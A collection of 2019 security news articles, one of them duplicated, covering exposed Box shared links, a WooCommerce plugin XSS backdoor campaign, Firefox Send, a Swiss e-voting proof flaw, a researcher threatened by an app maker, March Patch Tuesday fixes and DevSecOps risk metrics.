STE WILLIAMS

If your company uses Box for cloud-based file sharing, security researchers are advising you to stop reading right now and immediately disable public file sharing: vanity-named subdomains and URLs are “easily brute-forceable,” leaving companies’ publicly shared data open to extremely easy attacks.

Security firm Adversis published a report on Monday after using a “relatively large” wordlist to uncover hundreds of Box customers’ subdomains, through which they could access hundreds of thousands of documents and terabytes of extremely sensitive data.

A sampling of what the researchers found:

• Hundreds of passport photos
• Social Security and bank account numbers
• High-profile technology prototype and design files
• Lists of employees
• Financial data, invoices, internal issue trackers
• Customer lists and archives of years’ worth of internal meetings
• IT data, VPN configurations, network diagrams

Adversis says its initial impulse was to reach out to all the affected companies, but the scale of the task ruled that out. After finding that a large percentage of Box customer accounts that it tested had thousands of exposed, sensitive documents, the firm alerted some of those companies, gave Box a heads-up – that was on 24 September – and published its report.

As Box Chief Customer Officer Jon Herstein said in a blog post on Sunday, Box offers various ways for its customers to allow content sharing both between employees and outside the company.

Data stored in Box enterprise accounts is private by default. But in order to make it easy for its customers to share content with large groups – be it privately or publicly – Box offers the “Custom Shared Link” feature, which enables its customers to customize the default secure shared links so they’re easier to find. Box gives the example of a car company that wants to distribute public press releases for a product launch: you can see where the car company would like the idea of customizing the URL to read something like this: https://carcompanyname.app.box.com/v/pressrelease

This is neither a bug nor a vulnerability, mind you. It’s simply a way to easily make data publicly accessible with a single link. In fact, Adversis noted, it was called out as an easy attack method back in June 2018:

If your company is using #Box with custom domain, try brute-forcing /v/path ( company.app.box.com/v/). There could… twitter.com/i/web/status/1…

—
Nenad Zaric (@destructiones) June 07, 2018

The problem: with this type of predictable URL formulation, these “secret” links are easy to discover. So that’s what Adversis did: its researchers whipped up a script to scan for and enumerate Box accounts with lists of company names and wildcard searches. It easily found Box customer accounts by checking https://companyname .account.box.com. If that link returned a target company’s logo, that meant it’s a paying customer and is “probably susceptible,” the firm said.

Then, the researchers sat back and watched the wave come in:

At that point, we began brute forcing folder and file names which began returning results faster than we could review them.

Much of the data, found leaking in subdomains of dozens of companies, was harmless, in that it was meant to be public. But then too, there was all that “oh, dear!” data:

These included passport photos, prototype details with raw CAD files for some very prominent new and coming tech, Social Security Numbers, financial documents, internal IT data including network diagrams and asset information, and innumerable “confidential” slide decks.

Who’s leaking data?

Adversis says it contacted a “small minority” of affected companies and vendors, most of which promptly closed the leak. Box acknowledged the issue and updated its file-sharing guidelines.

Adversis gave TechCrunch a list of some of the exposed Box accounts, and the publication contacted several of the big names on that list. Those big companies represent a smorgasbord of industries: from a flight reservation system maker, on to a nonprofit that handles corpse donations, a TV network, Apple (though the tech behemoth apparently only exposed what looked like non-sensitive internal data, such as logs and regional price lists), and more.

The data exposed included default passwords and, in some cases, backdoor access passwords in case of forgotten passwords; a PR firm’s detailed proposal plans and more than a dozen resumes of potential staff for the project, including names, email addresses, and phone numbers.

That list of exposed accounts included even Box itself. From TechCrunch:

Box, which initially had no comment when we reached out, had several folders exposed. The company exposed signed non-disclosure agreements on their clients, including several U.S. schools, as well as performance metrics of its own staff, the researchers said.

What to do

Box recommended making these changes to deal with the issue of URL guessing and subsequent leakage:

• Administrators configure Shared Link default access to ‘People in your company’ to reduce accidental creation of public (open) links by users.
• Administrators regularly run a shared link report (as described here) to find and manage public custom shared links.
• Security Administrators leverage third-party SIEM or log tools to consistently review suspicious content activity across your enterprise.
• Users do not create public (open) custom shared links to content that is not intended for public consumption.
• Users only post shared content with open shared links on public web pages if you want the content to be indexed and available by Google and available for public consumption.

Box says it’s working on improving Box security by…

• Adding more user education to the link settings tool on Box to make the potential implications of public link access even more clear, and advising that no sensitive content ever be shared with this level of permission.
• Improved admin policies for public shared links, including changing the default setting in the Box Admin console to disabled public custom shared link URLs until a company Box Admin decides to enables it; and setting the default access level for shared links in Admin console to “people in your company.” That default can only be changed by a company’s Box Admin. As a result, in a default configuration of Box, end users will need to expressly change the shared link setting to “people with the link” to make the link externally accessible.
• More stringent controls to reduce unintended content access. Box says it’s working on a variety of methods to limit the unintended discovery of open/public links and prevent content access by external parties.

For its part, Adversis has open-sourced and published the scanning tool it used to find the exposed accounts. Aptly enough, the tool’s name is PandorasBox.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/DQNVPkrRHYM/

Hackers have been spotted targeting websites running unpatched versions of the WordPress plugin Abandoned Cart for WooCommerce.

According to a blog written by Mikey Veenstra of WordPress firewall company Defiant (formerly Wordfence), the attacks exploit a cross-site scripting (XSS) flaw in version 5.1.3, a plug-in designed to help site admins analyse and recover sales lost when shoppers abandon carts.

Affecting both paid and free versions of the software, the vulnerability is used to install two backdoors that compromise the site, the second a sneaky backup in case the site owners detect and disable the first.

The attack involves the hackers creating a cart containing bogus contact information, which is then abandoned. When the data in these fields is viewed by a site admin, a lack of output sanitisation means that the billing_first_name and billing_last_name fields become a single customer field containing an injected JavaScript payload.

This uses the admin’s browser session to deploy the backdoors, starting with a rogue admin account added using a hidden iframe which triggers new account creation, at which point a notification of success is sent via the attacker’s command and control.

The second backdoor is then added by opening another iframe to the plugins menu, which is scanned for any with an ‘activate’ link denoting that they are inactive. This is injected with a PHP backdoor script and lies dormant until the attackers decide to activate it.

How many sites have been targeted?

In an interview with ZDNet, Veenstra said Defiant had detected 5,251 accesses to a bit.ly link associated with the attacks.

This exaggerated the true number of active infections, while possibly underestimating the number of inactive ones (i.e. those in place but not yet triggered).

That makes the numbers game a bit of a guess, but it could be anything from the low hundreds to the low thousands from the estimated 20,000 plus installations that have downloaded the plugin.

Working out how many attacks have been successful is even harder because the Defiant only detects attacks as it repels them using its Wordfence firewall. More mysterious still is the attacker’s ultimate objective in executing the compromises.

What to do

The flaw was fixed on 18 February with the release of version 5.2.0, which “added sanitization checks for checkout field capture for guest users.” Anyone using the plugin should update to this version, or later, as soon as possible.

However, according to Defiant, this doesn’t address the secondary backdoor affecting inactive plugins. The company’s recommendation is to review all databases for possible injections.

After this check has been completed, review the user accounts present on your site. If any unauthorized administrator accounts are present, delete them immediately and begin your incident response process.

As with previous WordPress/plugin vulnerability incidents, the issue of updating is never far from the surface.

A recent report by Sucuri noted that the biggest risk to most CMSs are plugins, themes and extensions, which tend to be installed and then not updated often enough.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/Pv68INM-x5E/

Hackers have been spotted targeting websites running unpatched versions of the WordPress plugin Abandoned Cart for WooCommerce.

According to a blog written by Mikey Veenstra of WordPress firewall company Defiant (formerly Wordfence), the attacks exploit a cross-site scripting (XSS) flaw in version 5.1.3, a plug-in designed to help site admins analyse and recover sales lost when shoppers abandon carts.

Affecting both paid and free versions of the software, the vulnerability is used to install two backdoors that compromise the site, the second a sneaky backup in case the site owners detect and disable the first.

The attack involves the hackers creating a cart containing bogus contact information, which is then abandoned. When the data in these fields is viewed by a site admin, a lack of output sanitisation means that the billing_first_name and billing_last_name fields become a single customer field containing an injected JavaScript payload.

This uses the admin’s browser session to deploy the backdoors, starting with a rogue admin account added using a hidden iframe which triggers new account creation, at which point a notification of success is sent via the attacker’s command and control.

The second backdoor is then added by opening another iframe to the plugins menu, which is scanned for any with an ‘activate’ link denoting that they are inactive. This is injected with a PHP backdoor script and lies dormant until the attackers decide to activate it.

How many sites have been targeted?

In an interview with ZDNet, Veenstra said Defiant had detected 5,251 accesses to a bit.ly link associated with the attacks.

This exaggerated the true number of active infections, while possibly underestimating the number of inactive ones (i.e. those in place but not yet triggered).

That makes the numbers game a bit of a guess, but it could be anything from the low hundreds to the low thousands from the estimated 20,000 plus installations that have downloaded the plugin.

Working out how many attacks have been successful is even harder because the Defiant only detects attacks as it repels them using its Wordfence firewall. More mysterious still is the attacker’s ultimate objective in executing the compromises.

What to do

The flaw was fixed on 18 February with the release of version 5.2.0, which “added sanitization checks for checkout field capture for guest users.” Anyone using the plugin should update to this version, or later, as soon as possible.

However, according to Defiant, this doesn’t address the secondary backdoor affecting inactive plugins. The company’s recommendation is to review all databases for possible injections.

After this check has been completed, review the user accounts present on your site. If any unauthorized administrator accounts are present, delete them immediately and begin your incident response process.

As with previous WordPress/plugin vulnerability incidents, the issue of updating is never far from the surface.

A recent report by Sucuri noted that the biggest risk to most CMSs are plugins, themes and extensions, which tend to be installed and then not updated often enough.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/Pv68INM-x5E/

Mozilla’s Firefox Send, a free encrypted file sharing service, graduated from test to official release on Tuesday after a year and half of refinement.

Available on the web at send.firefox.com and soon through an Android app, Send first appeared in August 2017 as a way to encrypt local files and store them on Mozilla’s servers, provided by AWS, for retrieval with a one-time use URL.

The generated URL, displayed in the browser or app after the file has been locally encrypted and uploaded, is meant to be shared with the intended recipient of the file via email, instant messaging or other means.

Initially, Send supported files of up to 1GB, which it made available as downloads through the generated URL. And after one use, the link no longer functioned.

The official release maintains the 1GB size limit but supports up to 2.5GB for users signed in to a free Firefox Account. It also expands the number of times the shared file can be downloaded.

Users can now select from a handful of possible times a link can be used – 1, 2, 3, 4, 5, 20, 50, 100. File availability is also limited by time, depending upon which preset menu value is selected – 5 minutes, 1 hour, 1 day, and 7 days. These settings, however, can be changed to arbitrary values in the loaded HTML for the page prior to submission using Chrome’s Inspect option or Firefox’s Inspect Element.

“Send uses end-to-end encryption to keep your data secure from the moment you share to the moment your file is opened,” said Nick Nguyen, Mozilla’s VP of Firefox Product, in a blog post.

“It also offers security controls that you can set. You can choose when your file link expires, the number of downloads, and whether to add an optional password for an extra layer of security.”

On the inside

The service relies on the Web Crypto JavaScript API with the 128-bit AES-GCM algorithm to encrypt files locally before they’re sent to the cloud.

“Send uses the Encrypted Content Encoding defined in RFC8188 to encrypt files,” a Mozilla spokesperson explained in an email to The Register. “We generate a random 256-bit key that gets included in the hash portion of the share URL so that it can be shared without us (Mozilla) knowing what it is.”

The 128-bit AES-GCM key is used for the file and file metadata; the HMAC SHA-256 signing key is used for request authentication, as can be seen in the source code.

Mozilla also collects a limited amount of client and server information during Send interactions, detailed on its metrics page and in its privacy notice.

The anchor tag of the URL – the part after the # – contains the decryption key, which isn’t typically sent to the server but can be extracted via JavaScript. If the Send page is compromised, or if Mozilla decides to capture user keys, anyone in control of the Send application code could potentially modify it to read a submitted key via the browser’s window.location.hash variable.

However, Mozilla has made the source code available. So if using Mozilla’s version of Send, which runs atop Google Cloud Platform, seems too risky, users have the option to run their own instance on other cloud services like AWS (which hosted Send initially) or on a local machine sporting Node.js 10+.

From Firefox to fired cocks: Look who’s out to save you being shafted by insecure Internet of Dingalings – it’s Mozilla!

READ MORE

The Register asked whether Mozilla does any sort of file hashing to check uploaded images against known unlawful content. Mozilla’s spokesperson didn’t have an immediate answer about that but said using Send for illegal purposes is against the company’s terms of service.

The browser maker does occasionally receive subpoenas in conjunction with the use of its services and publishes a limited amount of information about this in its periodic transparency reports.

In countries where technology providers can be forced to provide technical assistance to authorities, there may be additional threat scenarios.

For Mozilla, Send represents a way to encourage people to create Firefox Accounts and to build a relationship with people who make informed technology choices (as opposed to those who use whatever is installed by default and don’t care about their tools). Services like Send may end up becoming more important to Mozilla as the seemingly irresistible gravity of Google Chrome pulls people away from Firefox.

There are already many ways to send files with varying degrees of security, some more verifiable than others. These include Ceph, Signal, WhatsApp, DropSecure, OnionShare, Cryptomator and wormhole, to say nothing of the big cloud companies’ file storage services or protocols like SFTP. What Send offers is simplicity from a fairly trusted brand and the power to run the code yourself if you’re so inclined. ®

Sponsored:
Becoming a Pragmatic Security Leader

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/13/mozilla_send_/

The Swiss Federal Chancellery (SFC) on Tuesday said security researchers have found an fascinating flaw in the Swiss Post’s e-voting system as part of an ongoing penetration test.

Said flaw, if successfully exploited by miscreants, would prevent officials from detecting unauthorized changes to citizens’ electronically-cast votes.

Swiss authorities released the source code of their computer-based voting system and began a public audit of their blueprints on February 25, 2019, to identify vulnerabilities and fix them. The test is scheduled to run until March 24, 2019.

The flaw in the sVote protocol, developed by technology provider Scytl, has to do with universal verifiability, the mathematical proofs that prevent vote manipulation.

“While the flaw does not allow the system to be penetrated, the researchers were able to demonstrate that the system does not generate conclusive mathematical proofs to identify whether any manipulation has taken place,” the SFC said. “This means that it is not possible to detect whether the votes have been tampered with.”

Researchers Sarah Jamie Lewis, Olivier Pereira, and Vanessa Teague, from the Open Privacy Research Society, Catholic University of Leuven, and the University of Melbourne respectively, describe the issue in a research paper published in conjunction with the SFC announcement.

They explain that the Swiss Post voting technology provides a mechanism – a mixnet – to shuffle electronically-submitted votes for the sake of privacy. The shuffling process encrypts the vote data, and is supposed to prove that the vote sets before and after shuffling are the same. But it fails to do so.

Proof

“We show that the mixnet specification and code recently made available for analysis does not meet the assumptions of a sound shuffle proof and hence does not provide universal or complete verifiability,” the researchers explain.

They note that other researchers, Thomas Haines of the Norwegian University of Science and Technology and Rolf Haenni of Bern University of Applied Sciences, independently identified this flaw.

That may be because the problem was identified in 2017. According to Swiss Post, Scytl, which is responsible for the source code, failed to fully fix the bug.

“Swiss Post regrets this and has asked Scytl to make the correction in full immediately, which they have done,” the organization said in a statement. “The modified source code will be applied with the next regular release.”

Scytl in a statement said it has received 67 reports from hackers participating in the penetration test, one of which is the mixnet flaw. “The code has already been updated by using the random verifiable mechanism that was already implemented in the voting system but had not been activated,” the company said.

The missing audit mechanism hasn’t been an issue in Swiss elections because the system has never been used in actual voting, according to Swiss Post. The cantons of Thurgau, Neuchâtel, Fribourg and Basel-Stadt currently use a different e-voting system.

Switzerland intends to consider the results of its test when it wraps up later this month and present a report, at which point the SFC will determine whether further changes to the new e-voting system are necessary. ®

Sponsored:
Becoming a Pragmatic Security Leader

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/12/swiss_evoting_system_vulnerability/

A developer specializing in mobile apps for US conservatives is under fire for threatening to call the Feds on someone who reported security shortcomings in its software.

On Tuesday, a French infosec bod, going under the Mr Robot-themed pseudonym Elliot Alderson and handle fs0c131y, notified 63red that it had left hard-coded credentials in its Yelp-for-Trumpistas smartphone application, and that whoever built its backend APIs had forgotten to implement any meaningful form of authentication.

63red made headlines earlier this month when it launched the app, which lets users rate and share details of businesses that are friendly to conservatives. In particular, if a restaurant, bar, or whatever, and its patrons, don’t mind you wearing a red Make America Great Again hat, they can be highlighted as such in 63red’s app.

Alderson poked around inside the Android build of the app, and spotted a few of insecure practices, including the username and password of the programmer, and a lack of authentication on its backend APIs, allowing anyone to pull up user account information, and potentially slurp the app’s entire user database. It’s also possible to insert data into the backend log files, we’re told.

The reaction from 63red was far from gracious. The biz responded by accusing the researcher carrying out a “politically motivated attack,” and promised to report the matter to the FBI.

“We see this person’s illegal and failed attempts to access our database servers as a politically-motivated attacked, and will be reporting it to the FBI later today,” 63red’s statement reads. “We hope that, just as in the case of many other politically-motivated internet attacks, this perpetrator will be brought to justice, and we will pursue this matter, and all other attacks, failed or otherwise, to the utmost extent of the law.”

63red described the privacy issues as a “minor problem,” and noted that no user passwords were exposed nor any user data changed.

Alderson said he is not particularly worried about the threats, noting that he did not have to break into any systems nor commit any crime to see data that the developer had left out in the open.

“The FBI threat is a threat, I didn’t do anything illegal,” he told The Register. “I didn’t break or hack anything. Everything was open.”

Meanwhile, members of the infosec community are raking the app developer over the coals for its handling of the vulnerability report.

Looks like @fs0c131y ‘s research revealing a rookie security mistake of having NO authentication on an API has triggered Stage 1 2 in the 5 Stages of Vulnerability Response Grief https://t.co/9REgvy2x33 .

Let’s hope FBI educates the folks at @63red about how this really works. https://t.co/aPqsvujvop

— Katie Moussouris (@k8em0) March 12, 2019

“Conservative” App creators threaten well known researcher with FBI after he discloses an issue.

This will not end well for you @63red pic.twitter.com/9DxGngoYah

— Oliver Hough 🐦 (@olihough86) March 12, 2019

The Register has asked 63red for further comment on the matter and an update on its communications with the FBI, but has yet to hear back at the time of publication. ®

Sponsored:
Becoming a Pragmatic Security Leader

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/12/63red_security_freakout/

Patch Tuesday It’s the second Tuesday of the month, and you know what that means: a fresh dump of security fixes from Microsoft, Adobe and others.

The March edition of Patch Tuesday includes fixes for 64 CVE-listed vulnerabilities, while Adobe addressed a pair of bugs in Photoshop and Digital Editions. Even SAP has got in on the game.

DHCP flaws headline Patch Tuesday priorities

Of the 64 bugs squashed in Redmond’s March update, researchers are pointing to five particular bugs as being especially noteworthy.

First, there are the trio of CVE-2019-0697, CVE-2019-0698, and CVE-2019-0726, all covering holes present in the DHCP server component for Windows. Each of the flaws would potentially allow an attacker on the local network to achieve remote code execution on a targeted machine simply by sending a malformed DHCP network packet.

“These bugs are particularly impactful since they require no user interaction – an attacker sends a specially crafted response to a client – and every OS has a DHCP client,” explained Dustin Childs of the Trend Micro Zero Day Initiative.

“There would likely need to be a man-in-the-middle component to properly execute an attack, but a successful exploit would have wide-ranging consequences.”

There’s no indication that the DHCP flaws being exploited in the wild but two other patches in this month’s bundle are already being used by online criminals. CVE-2019-0797 and CVE-2019-0808 are a pair of elevation of privilege flaws that have been detected in active use.

Childs also recommends admins make sure to test and install CVE-2019-0603, a remote code execution flaw in WDS TFTP server, and CVE-2019-0757, a package tampering flaw in NuGet.

Four of the flaws, CVE-2019-0683, CVE-2019-0754, CVE-2019-0757, and CVE-2019-0809, had already been publicly exposed. Only CVE-2019-0809, an input validation flaw in Visual Studio C++, would allow for remote code execution and should be tackled as soon as possible.

As is usually the case, Microsoft’s browser scripting engines accounted for the lion’s share of the critical fixes. The scripting engines in Edge, Internet Explorer, and VBScript (also used for ActiveX extensions in IE and Office) each received patches for vulnerabilities that would allow remote code execution simply by convincing the mark to visit a poisoned web page or open an Office Doc.

Devs and admins using Windows Subsystem for Linux will want to pay attention to CVE-2019-0682, CVE-2019-0689, CVE-2019-0692, CVE-2019-0693, CVE-2019-0694, five elevation of privilege flaws that could be exploited through poisoned applications.

Adobe touches up Photoshop, Digital Editions

Just two updates were kicked out from Adobe today, covering only one flaw. The problem is it appears in two separate apps..

For Photoshop CC on Windows and MacOS, the update will close up CVE-2019-7095, a heap corruption bug that would allow for arbitrary code execution on a vulnerable machine.

The same flaw is also present in Digital Editions, prompting Adobe to update that suite as well.

SAP stands for Significantly Annoying Pwnage

Those admins running SAP software are going to have a bit more to deal with today, as the enterprise computing giant dropped 15 of its own security notes.

Just two of those, an XML External Entity bug in HANA Extended Application Services and a cross-site scripting flaw in NetWeaver Java Application Server, were serious enough to warrant ‘high’ severity ratings but the rest should be fixed as soon as possible. ®

Sponsored:
Becoming a Pragmatic Security Leader

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/12/march_patch_tuesday_dhcp/

User errors in enterprise Box accounts have left hundreds of thousands of sensitive documents exposed to thieves and peeping toms.

Sharing public links to private files in Box enterprise storage can lead to more than productive collaboration: it can expose sensitive data to anyone with a search engine and a well-formed query.

Security firm Adversis discovered hundreds of Box customers who had hundreds of thousands of documents and terabytes of data exposed. In the blog post announcing the find, Adversis said it originally intended to notify all the companies whose data they found, but the scale of the discovery quickly made that impossible.

This is not a bug in Box, the researchers said: It’s an advertised feature that’s working precisely as it should but was misconfigured by users. Tech blog TechCrunch worked with Adversis and found large, public companies that had exposed millions of customer names, email addresses, phone numbers, and other sensitive information. When contacted, those companies took the sensitive information offline.

In a statement to Dark Reading, Pravin Kothari, CEO of CipherCloud said, “A single misconfiguration can cause havoc as all your sensitive information could be exposed to the public or hackers by a user’s inadvertent action. Not only do you have to deal with reputational damage, but if the exposed data had regulatory requirements then you’re also looking at stiff penalties.”

Box spokesperson Denis Roy told Tech Crunch: “We are taking steps to make these settings more clear, better help users understand how their files or folders can be shared, and reduce the potential for content to be shared unintentionally, including both improving admin policies and introducing additional controls for shared links.”

For more, read here and here.

 

 

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/cloud/box-mistakes-leave-enterprise-data-exposed/d/d-id/1334137?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

DevOps-minded CISOs say enterprise security teams need to do a better job scoring and visualizing risk for developers and business executives.

One of the biggest challenges security practitioners and leaders face in their mission to embed application security (AppSec) into the software development life cycle is a lack of engagement from developers. Leaders in DevSecOps teams who’ve tackled this challenge say that contrary to popular belief among cybersecurity pros, the root problem has nothing to do with developer apathy.  

Instead, they say that security has done a lousy job making AppSec risks truly visible to developers — and to the line of business.

More fundamentally, traditional cybersecurity practices are not providing the kind of actionable feedback to developers that helps them figure out how to make changes in their daily work that will actually reduce AppSec risk. On the flip side, providing this kind of metrics-driven security feedback is where the DevSecOps approach truly excels, as shown by a number of key practices shared last week at the RSA Conference (RSAC) by security leaders from the likes of Target, Comcast, Mastercard, and Highmark Health.

“We fundamentally believe that developers want to create secure applications, and it is our job as security practitioners to make that as easy as possible for them to do,” said Jodie Kautt, vice president of cybersecurity for Target. 

Kautt was one of several DevOps-minded security leaders to take the podium as a part of the DevSecOps Days program at RSAC, in which a key theme that bubbled up was how mature DevSecOps teams are making metrics more relatable and contextualized for developers and business stakeholders. What these teams realized is that laundry lists of unresolved vulnerabilities and huge, dusty policy tomes simply do not move the needle on developer behavior.

As an alternative, they shared a number of tips and best practices to start driving risk discussions based on data and business context.

Let Data Be Your Guide
Getting the security message across to developers, operations staff, application owners, and business leadership doesn’t have to be an uncrackable problem, said Anna Marie Zettlemoyer, vice president of security engineering for Mastercard. The best risk leaders make their case by finding the right metrics to tell their story. 

“Let data be your guide, part of your analysis, and part of your influence,” Zettlemoyer said. “Even when teams don’t speak the same language and we just aren’t understanding each other, the data can be a really great common denominator. People might not trust you at first, but they will trust the numbers.”

Use Audience-Centric Metrics
But not just any numbers will do. They’ve also got to be audience-centric to really make an impact, said Omar Khawaja, CISO for Highmark Health. 

“If I’m going up in front of the board. do you think I’m going to present to them the number of vulnerabilities in our applications? Do you think the board even knows what that means?” he said. “No. they care about business risk.”

He said it’s much more valuable for security people like himself to partner with people in business continuity, application owners and start cross-referencing the vulnerability statistics against the business criticality of affected applications to give the numbers context — and then simplify scoring so that it is possible to show the state of security in the most critical apps. Similarly, Zettlemoyer said security leaders should be developing metrics that as much as possible show the bottom-line impact of security risks. 

“So, make friends with your accountants to help you figure out where that impact is going to be on the balance sheet,” she suggested. 

Establish Transparent Risk Scoring
Some organizations, including Target, have evolved the contextualization and simplification of security metrics by developing consistent application risk scoring. At Target, the security team developed what the company calls the Product Intelligence score, which wraps in data from its vulnerability databases, GRC tooling, application management systems, dynamic scanning information, penetration tests, and the like. It weighs the output from those systems against business criticality of the application being scored, and also accounts for things such as the types of security services used by the development team and whether or not the team has a trained “Security Ninja,” or security champion, in its ranks. The output of all of that information is a single score that ranges anywhere from 300 to 850. 

“It all comes down to one number — think of that number as your credit score,” said Kautt, who explained that this score makes it easy to measure product and application teams across the board at the company, and to show visible security gains made over time on each application. 

Key to simplifying with scoring is being extremely open about how the scores are developed. 

“The score is transparent,” said Jennifer Czaplewski, director of product security for Target. “We give them all of the information that they need so they don’t just have to trust us that their score is 745 but that they can see for themselves how it was derived.”

Creating Simplified Dashboards
The transparency of Target’s Product Intelligence score is delivered through a dashboard that links to the data sources that Czaplewski and Kautt mentioned. In addition, the dashboard contextualizes how an application’s Product Intelligence score compares with other applications in the Target portfolio. Another crucial element is that it visualizes and explains what teams need to do to start improving their scores. 

“It’s not just the simplicity of the number that has made this so successful for us, but it’s that we highlight which actions teams can take in order to improve their Product Intelligence,” Kautt said. She and Czaplewski said they’ve done all of this with just a pair of software engineers and open source tooling from Apache Superset.

This sounds remarkably similar to the approach taken by Larry Maccherone and his team at Comcast. As senior director of DevSecOps transformation for Comcast, Maccherone has led the charge to develop a dashboard tool that visualizes each application team’s progress on a handful of key security practices. He recommends that any security team thinking of using an interactive dashboard as a means of self-assessment and accountability for development teams not get hung up in the minutiae of which key practices to measure but instead pick something and start doing it. Just like DevOps teams iterate with software, security teams should seek to create a minimum viable dashboard and iterate on it as they go along.  

“There are lots of starting points beyond the ones we chose,” he said. “What I want you to focus on here though is how we use this.” 

According to him, it’s all about getting developers, application owners, and executives focused on making incremental changes to the risk posture of their software. One of the most valuable ways that both Comcast and Target are using scoring and dashboarding is to provide senior management with a way to hold product teams and developers accountable for the security of their applications. 

For example, the security team trained the president of Comcast to read their visualization and engineering leads are required to bring their scores to meetings with the president about their progress on development work.  

The more visible the risk is, the more embedded security awareness and improvement becomes within the business culture of an organization. When organizations start to enact the kinds of practices named by DevSecOps leaders at RSAC, good things start to happen organically. 

“It was music to my ears when I walked into a CIO staff meeting a couple weeks ago and heard two officers bantering back and forth about where they were ending up with their scores at the end of the year,” Kautt said, explaining that she’s also seen teams throwing parties when they make their yearly Product Intelligence scoring goals. “Security is now driving the culture, without us asking for any of that.”

Related Content:

• 7 Steps to Start Your Risk Assessment
• 4 Ways At-Work Apps Are Vulnerable to Attack
• Trust, or Lack of It, Is a Key Theme on RSAC Keynote Stage
• Embracing DevSecOps: 5 Processes to Improve DevOps Security

 

 

 

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Ericka Chickowski specializes in coverage of information technology and business innovation. She has focused on information security for the better part of a decade and regularly writes about the security industry as a contributor to Dark Reading.  View Full Bio

Article source: https://www.darkreading.com/application-security/how-the-best-devsecops-teams-make-risk-visible-to-developers/d/d-id/1334138?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Seventeen vulnerabilities patches today are rated critical, four are publicly known, and two have been exploited in the wild.

Microsoft today rolled out security fixes for 64 security vulnerabilities along with four security advisories.

Of the bugs patched, 17 are rated critical, 45 are important, one moderate, and one low in severity. Four vulnerabilities are publicly known; two have been exploited in the wild. This month’s patches cover Microsoft Windows, Office Services and Web Apps, Internet Explorer, Edge, Exchange Server, ChakraCore, the .NET Framework, Team Foundation Services, and NuGet package manager.

The vulns being used in attacks are two zero-day elevation of privilege vulnerabilities in Windows, both rated important, that enable an attacker with system access to escalate their privileges and take over the system.

The first, CVE-2019-0797, was reported by Kaspersky Lab and affects Windows 8, Windows 10, and Windows Server versions 2012, 2016, and 2019. The second, CVE-2019-0808, was reported by the Google Threat Analysis Group. Researchers recently discovered attackers leveraging a Google Chrome vulnerability (CVE-2019-5786) along with the Microsoft flaw to attack systems.

“While bugs in Win32k are rated Important due to the access requirement, the impact of successful attacks shows why they shouldn’t be ignored,” writes Dustin Childs of Trend Micro’s Zero-Day Initiative.

This is the third month in a row Microsoft has issued multiple patches for its Windows Server DHCP service. It started the year fixing RCE vulnerability CVE-2019-0547 in January. The following month it released CVE-2019-0626 to patch a memory corruption bug in its DHCP service that would let a successful attacker run arbitrary code on a target DHCP server.

“There are three Windows DHCP Client Remote Code Execution vulnerabilities with a 9.8 CVSS score in this month’s release,” noted Satnam Narang, senior research engineer at Tenable, who said the continuance of this patching trend signals “increased attention on finding DHCP bugs.”

Now, March brings CVE-2019-0697, CVE-2019-0698, and CVE-2019-0726. Each patch addresses a bug that could let attackers execute code on target systems. It’s worth noting none of these vulnerabilities, all rated critical, require user interaction. An attacker could send specially crafted DHCP responses to a client in order to exploit the bug and gain system access.

“Deployment of patches to cover the three RCE vulnerabilities should be prioritized for all Windows systems,” said Jimmy Graham, director of product management for Qualys.

Other critical bugs addressed today exist in Chakra Scripting Engine, VBScript Engine, and Internet Explorer.

The day before it released its latest wave of security fixes, Microsoft announced a new Windows 10 feature that automatically uninstalls updates that fail as a result of incompatibility or new software problems. If this happens, users will see a notification saying “We removed some recently installed updates to recover your device from a startup failure,” says Microsoft.

This step is only taken if all other automatic recovery has proven unsuccessful.

Related Content:

• 5 Essentials for Securing and Managing Windows 10
• The 12 Worst Serverless Security Risks
• 3 Places Security Teams Are Wasting Time
• 6 Tips for Getting the Most from Your VPN

 

 

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/microsoft-patch-tuesday-64-vulnerabilities-patched-2-under-attack/d/d-id/1334141?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple